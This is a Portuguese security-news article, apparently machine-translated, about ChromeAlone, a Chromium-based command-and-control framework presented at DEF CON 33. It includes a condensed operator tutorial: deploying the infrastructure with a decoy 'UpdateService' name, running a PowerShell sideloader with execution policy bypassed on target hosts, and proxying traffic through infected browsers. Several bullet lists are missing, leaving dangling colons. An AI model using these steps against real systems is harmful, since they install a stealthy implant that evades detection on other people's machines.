ChromeAlone - Um Cobalt Strike baseado em navegador como a ferramenta C2 que transforma o Chrome em um playground de hackers - Against Invaders - Notícias de CyberSecurity para humanos.

Data: 2025-08-09 09:27:03

Autor: Inteligência Against Invaders

URL: https://datalake.azaeo.com/news-againstinvaders-com/07dd3cac6e2b9d2afc210bb6db0142d1/chromealone-um-cobalt-strike-baseado-em-navegador-como-a-ferramenta-c2-que-transforma-o-chrome-em-um-playground-de-hackers-against-invaders-noticias-de-cybersecurity-para-humanos/61/


Na DEF CON 33, o pesquisador de segurança Mike Weber, da Praetorian Security, revelou o ChromeAlone – um Estrutura de Comando e Controle (C2) do navegador baseado em Chromium capaz de substituir implantes de segurança ofensivos tradicionais como Golpe de cobalto ou Meterpreter.

Não muito tempo atrás, os navegadores da web eram pouco mais do que wrappers para solicitações HTTP. Hoje, são plataformas complexas e repletas de recursos, tão sofisticadas que se assemelham a sistemas operacionais completos. Essa evolução traz conveniência, mas também uma superfície de ataque massiva.

O ChromeAlone é uma estrutura de código aberto que transforma essa complexidade em uma arma, usando recursos integrados do Chrome para replicar os recursos de um implante tradicional de Comando e Controle (C2), ao mesmo tempo em que passa pela maioria dos sistemas de detecção de endpoint.

O que diferencia o ChromeAlone é sua discrição: ele se esconde inteiramente nos recursos nativos do Chromium, evitando as pegadas óbvias de malware que Detecção e resposta de endpoint (EDR) geralmente procuram.

O ChromeAlone carrega componentes maliciosos no navegador sem interação do usuário, aproveitando:

O resultado é um implante furtivo e altamente capaz que se mistura à atividade legítima do navegador – um desafio para os sistemas antivírus e EDR tradicionais que se concentram em arquivos executáveis em vez de extensões de navegador ou processos internos.

Por que o ChromeAlone é um grande negócio

De acordo com o repositório, os implantes ChromeAlone podem:

Para os membros da equipe vermelha, isso significa furtividade e flexibilidade. Para os defensores, isso significa mais um lugar para procurar invasões: o próprio navegador.

Guia passo a passo do operador para o ChromeAlone

Enquanto a ferramenta foi Lançado para pesquisa e testes autorizados, seu README detalha um pipeline de implantação completo. Aqui está o tutorial destilado.

1. Crie a imagem do Docker

docker build -t chromealone 

2. Implante a infraestrutura

O ChromeAlone é compatível com dois modos de implantação:

Opção A – Nova implantação da AWS

Requisitos:

Comando:

docker run --rm -v $(pwd):/project -v ~/.aws:/root/.aws 
chromealone --domain=sendmea.click --appname=UpdateService

Saídas:

Opção B – Usando a implantação existente

Se você já tiver um servidor implantado, aponte o ChromeAlone para seu terraform.tfvars:

docker run --rm -v $(pwd):/project -v ~/.aws:/root/.aws 
chromealone --tfvars=/project/path/to/terraform.tfvars --appname=UpdateService

Isso regenera sideloaders e extensões maliciosas sem reimplantar a infraestrutura.

3. Instale nos hosts de destino

Copiar sideloader.ps1 para o destino e executar:

powershell.exe -ExecutionPolicy Bypass -File .sideloader.ps1

Sinalizadores opcionais:

A execução normalmente leva 20 a 30 segundos.

4. Operando o ChromeAlone

Depois de implantado, abra:

output/client/index.html

Este webapp pré-configurado se conecta ao PLANO DE BATALHA servidor de retransmissão.

A partir daqui, os operadores podem:

5. Proxy de SOCKS

Each host infectado tem uma porta SOCKS exclusiva mostrada no painel “Informações do agente”.

Exemplo:

proxychains -q socks5 admin:thisisnotarealpassword@chrome.alone:1081 curl http://ifconfig.me

Funcionamento interno do ChromeAlone

O repositório se divide em componentes especializados:

Embora o ChromeAlone seja uma ferramenta legítima de teste de penetração, ele demonstra uma tendência crescente: o armamento do software do dia a dia. Os navegadores estão se tornando cada vez mais ambos o vetor de ataque e o centro de comando.

Os defensores devem:

Ache esta notícia interessante! Siga-nos noGoogle Notícias,LinkedIn, &Xpara obter atualizações instantâneas!